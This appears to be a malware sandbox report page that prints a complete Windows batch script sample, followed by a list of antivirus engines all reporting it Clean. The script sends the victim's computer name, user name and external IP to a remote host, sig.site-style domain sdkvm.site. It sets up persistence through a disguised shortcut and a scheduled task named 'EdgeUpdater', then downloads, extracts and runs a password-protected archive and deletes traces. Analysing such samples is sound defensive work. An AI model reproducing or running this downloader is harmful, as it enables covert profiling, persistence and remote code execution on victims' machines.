Static | ZeroBOX
No static analysis available.
if not DEFINED IS_MINIMIZED set IS_MINIMIZED=1 && start "" /min "%~dpnx0" %* && exit
@echo off
For /f %%A in (
'powershell -command "(Invoke-Webrequest "http://api.ipify.org").content"'
) Do Set ExtIP=%%A
set pcinf=%ComputerName%:%UserName%:%ExtIP%
set crl="c:\windows\system32\curl.exe"
powershell -command %crl% https://sdkvm.site/def/check.php?pcn=%pcinf%
set SCRIPT="%TEMP%\%RANDOM%-%RANDOM%-%RANDOM%-%RANDOM%.vbs"
echo Set oWS = WScript.CreateObject("WScript.Shell") >> %SCRIPT%
echo sLinkFile = "%USERPROFILE%\start.lnk" >> %SCRIPT%
echo Set oLink = oWS.CreateShortcut(sLinkFile) >> %SCRIPT%
echo oLink.TargetPath = "c:\windows\system32\cmd.exe" >> %SCRIPT%
echo oLink.Arguments = "/c start /min c:\programdata\curl.bat" >> %SCRIPT%
echo oLink.IconLocation = "c:\windows\notepad.exe" >> %SCRIPT%
echo oLink.Save >> %SCRIPT%
c:\windows\system32\cscript.exe /nologo %SCRIPT%
del %SCRIPT%
c:\windows\system32\schtasks.exe /create /sc daily /tn "EdgeUpdater" /tr "c:\programdata\start.lnk" /st 10:00 /F
move %USERPROFILE%\start.lnk c:\programdata
set SCRIPT1="%TEMP%\curl.bat"
echo powershell -command %crl% https://sdkvm.site/def/%pcinf%/z.rar -o c:\users\public\z.rar >> %SCRIPT1%
echo C:\Windows\System32\cmd.exe /c C:\"Program Files"\WinRAR\WinRAR.exe x -y -inul -p1234 c:\users\public\z.rar c:\users\public >> %SCRIPT1%
echo del /q /s /f c:\users\public\*.rar >> %SCRIPT1%
echo c:\users\public\run.lnk >> %SCRIPT1%
echo del /q /s /f c:\users\public\*.lnk >> %SCRIPT1%
echo exit >> %SCRIPT1%
move %SCRIPT1% c:\programdata
del %SCRIPT1%
move %0 c:\programdata
Antivirus Signature
Bkav Clean
Lionic Clean
DrWeb Clean
ClamAV Clean
CMC Clean
CAT-QuickHeal Clean
ALYac Clean
Malwarebytes Clean
VIPRE Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
BitDefenderTheta Clean
VirIT Clean
Cyren Clean
Symantec Clean
ESET-NOD32 Clean
TrendMicro-HouseCall Clean
Avast Clean
Cynet Clean
Kaspersky Clean
BitDefender Clean
NANO-Antivirus Clean
SUPERAntiSpyware Clean
MicroWorld-eScan Clean
Tencent Clean
Sophos Clean
F-Secure Clean
Baidu Clean
Zillya Clean
TrendMicro Clean
McAfee-GW-Edition Clean
FireEye Clean
Emsisoft Clean
Ikarus Clean
Jiangmin Clean
Avira Clean
Antiy-AVL Clean
Microsoft Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Clean
ViRobot Clean
ZoneAlarm Clean
GData Clean
Google Clean
AhnLab-V3 Clean
Acronis Clean
McAfee Clean
MAX Clean
VBA32 Clean
Zoner Clean
Rising Clean
Yandex Clean
TACHYON Clean
MaxSecure Clean
Fortinet Clean
AVG Clean
Panda Clean
No IRMA results available.